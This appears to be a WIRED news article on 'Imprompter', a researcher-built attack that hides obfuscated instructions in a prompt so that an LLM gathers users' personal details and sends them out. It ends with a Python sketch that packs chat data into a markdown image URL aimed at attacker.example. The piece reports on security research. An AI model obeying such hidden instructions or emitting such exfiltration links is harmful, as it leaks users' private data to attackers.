This Prompt Can Make an AI Chatbot Identify and Extract Personal Details From Your Chats

WIRED

When talking with a chatbot, you might inevitably give up personal information: your name, for instance, and maybe details about where you live and work, or your interests. The more you share with a large language model, the greater the risk of that information being abused if there's a security flaw.

A group of security researchers from the University of California, San Diego (UCSD) and Nanyang Technological University in Singapore is now revealing a new attack that secretly commands an LLM to gather your personal information, including names, ID numbers, payment card details, email addresses, mailing addresses, and more, from chats and send it directly to a hacker.

The attack, named Imprompter by the researchers, uses an algorithm to transform a prompt given to the LLM into a hidden set of malicious instructions. An English-language sentence telling the LLM to find personal information someone has entered and send it to the hackers is turned into what appears to be a random selection of characters.
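To illustrate the general shape of such an exfiltration step (a simplified sketch, not the researchers' actual algorithm or payload; the domain and field names below are invented), a hidden instruction of this kind might coax a chatbot into emitting a markdown image whose URL carries details from the conversation. When the user's client renders that image, it silently sends the data to a server the attacker controls:

```python
from urllib.parse import quote

def exfiltration_markdown(extracted: dict[str, str]) -> str:
    """Hypothetical illustration: pack details extracted from a chat
    into the URL of a markdown image tag. Rendering the 'image'
    triggers a web request that delivers the data to the attacker."""
    payload = "/".join(quote(v, safe="") for v in extracted.values())
    return f"![](https://attacker.example/{payload})"

# Example details an attacker might target (invented for this sketch).
details = {"name": "Jane Doe", "email": "jane@example.com"}
print(exfiltration_markdown(details))
# → ![](https://attacker.example/Jane%20Doe/jane%40example.com)
```

The sketch shows why the obfuscated prompt is dangerous even though it looks like random characters: the harmful behavior is carried out by ordinary model output (a markdown image) that chat interfaces routinely render.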